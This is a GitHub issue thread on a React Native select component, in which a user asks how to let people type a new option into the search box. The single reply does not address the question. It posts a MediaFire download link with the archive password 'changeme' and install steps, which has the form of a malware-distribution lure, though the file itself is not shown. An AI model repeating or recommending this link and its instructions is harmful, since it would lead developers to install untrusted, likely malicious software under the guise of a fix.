### ISSUE TITLE
Type new option

### ISSUE THREAD

**Issue by azeezat** [azeezat/react-native-select#79]
### Discussed in https://github.com/azeezat/react-native-select/discussions/78

<div type='discussions-op-text'>

<sup>Originally posted by **smith15973** August 30, 2024</sup>
Is there a way to make this either a select or you can type in the search box to create a new option. I want the user to be able to select from a list of ingredients but also be able to enter a new ingredient if it is not already in the list of options</div>

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
